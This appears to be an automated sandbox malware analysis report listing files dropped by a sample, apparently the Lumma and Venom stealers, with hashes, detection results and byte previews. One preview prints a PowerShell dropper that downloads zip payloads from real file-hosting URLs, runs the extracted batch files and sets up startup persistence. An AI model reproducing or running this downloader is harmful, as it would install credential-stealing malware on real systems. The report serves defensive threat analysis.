Preview:	`......^..)....0...............uw..r.U....;??..k0..H_{ZA...k..a......e.... .uj_./.&{E....y.9..A. ..<."L\Pu..+d.. D.............V.>0...).HA;.$..Z./(..V...-..oZ.[..e...e.....6.iE[..G.064...^P..j^..H..F\E.k.N..7.u`.K......{r..'{k,...7.......$.9;:.d..!v.Lf.5B.....;<......#.lQ(Z..O{7.&5..c~...X...t.`..eu3W.......d..[..Q..c.s.dU..-.l.S.(....i..7.H...2.S....}.N......Xan...T...O3...`L.J...T...L:..]..-U.}.&..Wx%.'....q...\|m..7.\...CO..s..^......{cW.'}........'.....H.k-....G.G..}.#H.o.......C....hE8.\...N...s......N..^.\|:{...@........l..`.{.C.?...&v.Ny..4.%....\........q......................X..... O.~K.p..x..7..m......G.6Fe..u...$.s.[.....;.q..*.)\|v&....0:0..M:.!..6...7.u.....!.3...D...X....p.N.Z...t..hh6..".-..8.......?Bz.2O.....&[.:8H.R>2......K.`..\r.fb....Op..L.kcY...u...{...=i..7.".&M....!.9...w(.p..)j.....'.v.....~...h..TG)#u@.?.XN16.y.Ug .=...J+..lkg.......1D....w...O..v./.....z._.....g..0.;&9..."(^.....?...:gd.u.Z..6....oI..!.9...m.\|.0..7.oR..

C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	398336
Entropy (8bit):	5.845773382535582
Encrypted:	false
SSDEEP:	6144:OXF8n/X2S6WUvk9pMT2/JBTe/h3/DdEG2nAOhn73i4:O6/76Tk3JBTmqAOk4
MD5:	640C7C7EFAE54CC8DB95B07151C1E70D
SHA1:	F5B6B37F8940A558CD0C4A5BC5BD8A668A4E61AA
SHA-256:	E9F6DC3F1BD84642326784C7EB700125B548AA9522AD35EAF36903FBB1B5650E
SHA-512:	694273FEC690B2751A36B964679D3DF58A4A66689BB507DB20A0BEEF743F983B36A46589D6642EEF1E625478D523186D84436028E23C833A601908D9CADE73A9
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......EL.`.-.3.-.3.-.3._.2.-.3._.2.-.3._.2.-.3..2.-.3..2.-.3..2.-.3.-.3.-.3...2.-.3.-.3#-.3...2.-.3...2.-.3Rich.-.3........PE..L...@.f.........."!...(.n...................................................@............@.................................`...d................................7...j..T...................@k.......j..@............................................text....l.......n.................. ..`.rdata...'.......(...r..............@..@.data...PK.......B..................@....reloc...7.......8..................@..B........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	40376
Entropy (8bit):	5.902054884820747
Encrypted:	false
SSDEEP:	768:YRQnUhG5bZDOTpkdD82YbQkRFokFWIILPUh:FWObZDOTpk5T6zqAh
MD5:	F1B14F71252DE9AC763DBFBFBFC8C2DC
SHA1:	DCC2DCB26C1649887F1D5AE557A000B5FE34BB98
SHA-256:	796EA1D27ED5825E300C3C9505A87B2445886623235F3E41258DE90BA1604CD5
SHA-512:	636A32FB8A88A542783AA57FE047B6BCA47B2BD23B41B3902671C4E9036C6DBB97576BE27FD2395A988653E6B63714277873E077519B4A06CDC5F63D3C4224E0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.1..._..._..._......._...^..._......._......._......._.Rich.._.........................PE..L.....P.....................\|............... ....@.................................-........................................!..P....P...t..........................0 ............................................... ..0............................text...5........................... ..`.rdata....... ......................@..@.data........0......................@....CRT.........@......................@..@.rsrc....t...P...v..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ExtractedLumma\run.bat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	49
Entropy (8bit):	4.476456017363834
Encrypted:	false
SSDEEP:	3:mKDDFRKnwdJI0CHhSnu/:hGwdxCHYno
MD5:	119839A00B05FCD9AED401736B817ACF
SHA1:	07F23D288EC1E8DE71F7D262D00172D419725EE2
SHA-256:	340034255D14BA5EE3E9F794064D81B675E2ACA6452D86F461583577C051EAF4
SHA-512:	545C68B5BB9B8249D8FEDA76792D9279AEE0482E26C261B9F2A5FE97D3496D208A6DB31BE3536D947CE1AF895AEA65365E9935738268129C8A6AC5FD3CC5CBD2
Malicious:	false
Preview:	@echo off..start "" /b "lm.exe" >nul 2>&1..exit..

C:\Users\user\AppData\Local\Temp\ExtractedVenom\data.bin

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	106495
Entropy (8bit):	7.9980244323728495
Encrypted:	true
SSDEEP:	3072:8cK8hPo9OmXlpd2zSAaSJAMCjOnjTaGcAXb87:8toOhl2mAaSOFIT6AXw7
MD5:	3D5A228A61FC2FBFAFB6D63A6F6C77A7
SHA1:	D76DDCBB0EEF778F5C72B628A5696B8F67EDD32C
SHA-256:	1D6C79DFFF9E47928457C86CDEFAEAAB185B3476FD3F568AD668252CD53F8877
SHA-512:	1B04BCA4C65377B406E04A8267CAB9B5D853B5E339A3B2AEC6ECEB70A8C3A64CBA5DE390193F9CC0DD26A7B57A0C520622DAE9DFAF2EB3202C7EAA3D48DA5CD5
Malicious:	false
Preview:	`......Z.......0..................`...8..k.@~CBBxED....&dI.....,.e...D3c......u.6........,...Q... .aH]?A...x.W7.c..;.f.U.....C.ZK.W...v...o....R....u-2.........#..S_....m..?...4..K...v.IlUe.........D.....R. I..h6.B.....Z}iN..H.hd....,....".n e8.p..+....8...M.D.M.s...5.$..F/...f.(........&...%....6..+.Q7..`\.1.q.g..u.d.6.A.[.=?.@...e.I......^....>......c...z..Qn1..~.+y.... .........]..C.f..GZm3.....A8..f_.r.1.8..Mar9.j.(...6K..J..>.R..jlNx.Lr..333..d.nJc Z...f.O...`.Jiz.w3...s.d.R......+..\...M......s.J.!W.......FQ(...&.j\|..1.;.}.yo.....1..Al.......6]A.nD.-.~..pz~.1...g.........................D/V"\N..c.q.nxi...8l..7.^...l.(S^...H......R......V. .u..T.....7;2...Q.)5(.0...!..../......z.]..,..!N........q...5\|V......e.:P..%._.L....xu...;.r..~.&....k.Q.@...(..o.2..h..G..Z%...N.....;".}....%7.\<...'..c....s. \0..f)7eh....M.....F.v}...}c..Gy3..I.j.@..F...\|.....K.M.$.z...aF...z.....\LB.H....}.)8$...8iV...<.'A...L.P.K....Q3.QJ>YZ.....*Hz..T.IX.t.+2.eO.$.8R

C:\Users\user\AppData\Local\Temp\ExtractedVenom\g2m.dll

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	398336
Entropy (8bit):	5.845773382535582
Encrypted:	false
SSDEEP:	6144:OXF8n/X2S6WUvk9pMT2/JBTe/h3/DdEG2nAOhn73i4:O6/76Tk3JBTmqAOk4
MD5:	640C7C7EFAE54CC8DB95B07151C1E70D
SHA1:	F5B6B37F8940A558CD0C4A5BC5BD8A668A4E61AA
SHA-256:	E9F6DC3F1BD84642326784C7EB700125B548AA9522AD35EAF36903FBB1B5650E
SHA-512:	694273FEC690B2751A36B964679D3DF58A4A66689BB507DB20A0BEEF743F983B36A46589D6642EEF1E625478D523186D84436028E23C833A601908D9CADE73A9
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......EL.`.-.3.-.3.-.3._.2.-.3._.2.-.3._.2.-.3..2.-.3..2.-.3..2.-.3.-.3.-.3...2.-.3.-.3#-.3...2.-.3...2.-.3Rich.-.3........PE..L...@.f.........."!...(.n...................................................@............@.................................`...d................................7...j..T...................@k.......j..@............................................text....l.......n.................. ..`.rdata...'.......(...r..............@..@.data...PK.......B..................@....reloc...7.......8..................@..B........................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	49
Entropy (8bit):	4.517272343894447
Encrypted:	false
SSDEEP:	3:mKDDFRKnwdTCHhSnu/:hGwdWHYno
MD5:	1AB4DC21DCB24F5B7345CE5C0B794B82
SHA1:	18F722AD31EE9D81181F8CA2CEF60A70B03BB030
SHA-256:	AC2103023D146E62C3B708384AE0ED044D17258901272068EF93C15C9F5AA06E
SHA-512:	83F1D566B8F5B7875811762433CF7C2722225C789A3B917B2C4184A442D9D6AF9C6FE703CE354D223824CFE8ED86E6E7780EC02008C093298FBCD3C08840DBDD
Malicious:	true
Preview:	@echo off..start "" /b "vm.exe" >nul 2>&1..exit..

C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	40376
Entropy (8bit):	5.902054884820747
Encrypted:	false
SSDEEP:	768:YRQnUhG5bZDOTpkdD82YbQkRFokFWIILPUh:FWObZDOTpk5T6zqAh
MD5:	F1B14F71252DE9AC763DBFBFBFC8C2DC
SHA1:	DCC2DCB26C1649887F1D5AE557A000B5FE34BB98
SHA-256:	796EA1D27ED5825E300C3C9505A87B2445886623235F3E41258DE90BA1604CD5
SHA-512:	636A32FB8A88A542783AA57FE047B6BCA47B2BD23B41B3902671C4E9036C6DBB97576BE27FD2395A988653E6B63714277873E077519B4A06CDC5F63D3C4224E0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.1..._..._..._......._...^..._......._......._......._.Rich.._.........................PE..L.....P.....................\|............... ....@.................................-........................................!..P....P...t..........................0 ............................................... ..0............................text...5........................... ..`.rdata....... ......................@..@.data........0......................@....CRT.........@......................@..@.rsrc....t...P...v..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\F6D9.exe

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	988672
Entropy (8bit):	7.331838963074561
Encrypted:	false
SSDEEP:	24576:0GRnx275QAJByPBIA/7oWw7XNyTvvvsjPhWm+2sGb6aYU8XFUiUBJRR7VFrQSgds:0GRna2EByPBIA/7oWw7XNyTvvUbhl+2j
MD5:	2B3ECC21382E825D6FE0812A717717EB
SHA1:	F3386531F7726A4F673003BF6CB5806843B76FFB
SHA-256:	AF252D8F2C1166000A47BC52A23BA6DBEE07EE4ADF4DE833F633A33DB2AA2152
SHA-512:	7C1BF7F216861E435E71EAED6F9FF44A8453833C17896E661174B7616A9C25C7DA21AD4F8687FE00F39380C7A2BEBB854C3D7F47EED14021781CCDFC65DCB7C0
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 16%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...lZA..........."..........\.......Z.........@.............................p............`.........................................x...D....................................`..X....................................................................................text............................... ..`.rdata...P.......L..................@..@.data....0... ......................@....CRT.........P......................@..@.reloc..X....`......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IXDaI.exe

Download File

Process:	C:\Users\user\Desktop\7Y18r(14).exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031075575407894
Encrypted:	false
SSDEEP:	384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
MD5:	F7D21DE5C4E81341ECCD280C11DDCC9A
SHA1:	D4E9EF10D7685D491583C6FA93AE5D9105D815BD
SHA-256:	4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
SHA-512:	E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwvtgaet.uft.ps1

Download File

Process:	C:\Users\user\AppData\Local\Temp\753F.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hnrcxkxp.2n0.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jm4hxg24.ta1.psm1

Download File

Process:	C:\Users\user\AppData\Local\Temp\753F.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qase4wks.3lz.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xj2mwzl1.03l.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zkuzqpgv.rbl.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\lumma.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	528925
Entropy (8bit):	7.999322324722934
Encrypted:	true
SSDEEP:	12288:xyY9C/+kpVD3KhE7vLg5C9pyKy8/i4wDW9Ns8PDjxQ1x8MjR6DngMl:xhs/+oksg5CTyYa4wa9JJbus
MD5:	C326FE916E749D691CAEDBC7851F984C
SHA1:	ABF574E081288F7FC0D270A4ABD79372C7DAA3F2
SHA-256:	6E6199329BB1C1989E8D5266A5F57119E4454A4716DC5A1D16638D4BE645C1F0
SHA-512:	EF8899ADEB8396EF207243711038217BD50E1800C6BAA2D70C869A11BDA1F21D04D1C8CBC381111BF9311385116F6A27AD1DFF3A8E72D278079FBCDB46440293
Malicious:	false
Preview:	PK.........{.X.8..(...)......data.bin..,..`......^..)....0...............uw..r.U....;??..k0..H_{ZA...k..a......e.... .uj_./.&{E....y.9..A. ..<."L\Pu..+d.. D.............V.>0...).HA;.$..Z./(..V...-..oZ.[..e...e.....6.iE[..G.064...^P..j^..H..F\E.k.N..7.u`.K......{r..'{k,...7.......$.9;:.d..!v.Lf.5B.....;<......#.lQ(Z..O{7.&5..c~...X...t.`..eu3W.......d..[..Q..c.s.dU..-.l.S.(....i..7.H...2.S....}.N......Xan...T...O3...`L.J...T...L:..]..-U.}.&..Wx%.'....q...\|m..7.\...CO..s..^......{cW.'}........'.....H.k-....G.G..}.#H.o.......C....hE8.\...N...s......N..^.\|:{...@........l..`.{.C.?...&v.Ny..4.%....\........q......................X..... O.~K.p..x..7..m......G.6Fe..u...$.s.[.....;.q..*.)\|v&....0:0..M:.!..6...7.u.....!.3...D...X....p.N.Z...t..hh6..".-..8.......?Bz.2O.....&[.:8H.R>2......K.`..\r.fb....Op..L.kcY...u...{...=i..7.".&M....!.9...w(.p..)j.....'.v.....~...h..TG)#u@.?.XN16.y.Ug .=...J+..lkg.......1D....w...O..v./.....z._.....g..0.;&9..."(^....

C:\Users\user\AppData\Local\Temp\rentry-script.ps1

Download File

Process:	C:\Users\user\AppData\Local\Temp\753F.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2511
Entropy (8bit):	5.252889385795675
Encrypted:	false
SSDEEP:	48:mMB+fxMBQDwX7jCe9HSVdat4ZLd/FK16hiHKiK/OQ/v6/Q6RER/h0JweXuH:mM0fxMi4CQo1tg1lthpS
MD5:	882093038301A8EB3C3310CE46E1075E
SHA1:	157D0D5855C2A66DFE02E06C43B4C56C640B64E6
SHA-256:	ED089944CAF15DB2638AA0BBB7B6FC7BECD4F4D5C08C12F4922AA7BC811046A9
SHA-512:	0F2FB0F4DC18C2C0CB46897D70359D3734F7F737456860083AE9932820FD2AB58DB550F491F594D0531D9465D43BD4FAA6D5B9967716563C7A9E09AEB67DCFC9
Malicious:	true
Preview:	$url1 = "https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip"..$url2 = "https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip"..$tempDir1 = [System.IO.Path]::Combine($env:TEMP, "ExtractedVenom")..$tempDir2 = [System.IO.Path]::Combine($env:TEMP, "ExtractedLumma")..$zipPath1 = [System.IO.Path]::Combine($env:TEMP, "venom.zip")..$zipPath2 = [System.IO.Path]::Combine($env:TEMP, "lumma.zip")....function Download-File {.. param (.. [string]$url,.. [string]$outputPath.. ).. Invoke-WebRequest -Uri $url -OutFile $outputPath..}....function Run-BatFiles {.. param (.. [string]$directory.. ).. $batFiles = Get-ChildItem -Path $directory -Filter *.bat -File.. foreach ($batFile in $batFiles) {.. Start-Process -FilePath "cmd.exe" -ArgumentList "/c $($batFile.FullName)" -WorkingDirectory $directory -NoNewWindow.. }..}....function Add-VbsToStartup {.. param (.. [string]$batFilePath

C:\Users\user\AppData\Local\Temp\venom.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	296998
Entropy (8bit):	7.998052107159895
Encrypted:	true
SSDEEP:	6144:/3eshJ2mAOSiLZh4CPIKBZW7ZN7o8PDj6QN9Q1xipM8QHxwM4Dngzi:feshYbDi1OwDW9Ns8PDjxQ1x8MjR6Dnz
MD5:	8090D3FF2BF334B750478761C31BF25E
SHA1:	EC048B210369DD140BE8ED66D07AC4466AB5F7E4
SHA-256:	63B0E303A05AD2EB2A93E2F9CD96E50361CF1E0D29F9CAB8B0A98D1185347F8A
SHA-512:	DFBBB3468C2012BDF920B8C09DFDB655F3E1369EA9465228E505F1D1DE3AEF9EC9757D7B501C4091C3FF7859F57D2CA646430B4E5CF0E5292AB602B0FB28F654
Malicious:	false
Preview:	PK.........t.X.............data.bin..,..`......Z.......0..................`...8..k.@~CBBxED....&dI.....,.e...D3c......u.6........,...Q... .aH]?A...x.W7.c..;.f.U.....C.ZK.W...v...o....R....u-2.........#..S_....m..?...4..K...v.IlUe.........D.....R. I..h6.B.....Z}iN..H.hd....,....".n e8.p..+....8...M.D.M.s...5.$..F/...f.(........&...%....6..+.Q7..`\.1.q.g..u.d.6.A.[.=?.@...e.I......^....>......c...z..Qn1..~.+y.... .........]..C.f..GZm3.....A8..f_.r.1.8..Mar9.j.(...6K..J..>.R..jlNx.Lr..333..d.nJc Z...f.O...`.Jiz.w3...s.d.R......+..\...M......s.J.!W.......FQ(...&.j\|..1.;.}.yo.....1..Al.......6]A.nD.-.~..pz~.1...g.........................D/V"\N..c.q.nxi...8l..7.^...l.(S^...H......R......V. .u..T.....7;2...Q.)5(.0...!..../......z.]..,..!N........q...5\|V......e.:P..%._.L....xu...;.r..~.&....k.Q.@...(..o.2..h..G..Z%...N.....;".}....%7.\<...'..c....s. \0..f)7eh....M.....F.v}...}c..Gy3..I.j.@..F...\|.....K.M.$.z...aF...z.....\LB.H....}.)8$...8iV...<.'A...L.P

C:\Users\user\AppData\Local\Temp\{13F86EBE-5A0C-4E70-8D68-55A07A8CE44C}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{2C4EDB85-9C37-4123-AEB5-E5F69A5070D9}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{8069E4B2-8AC2-42AB-A302-D386C8F7446B}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
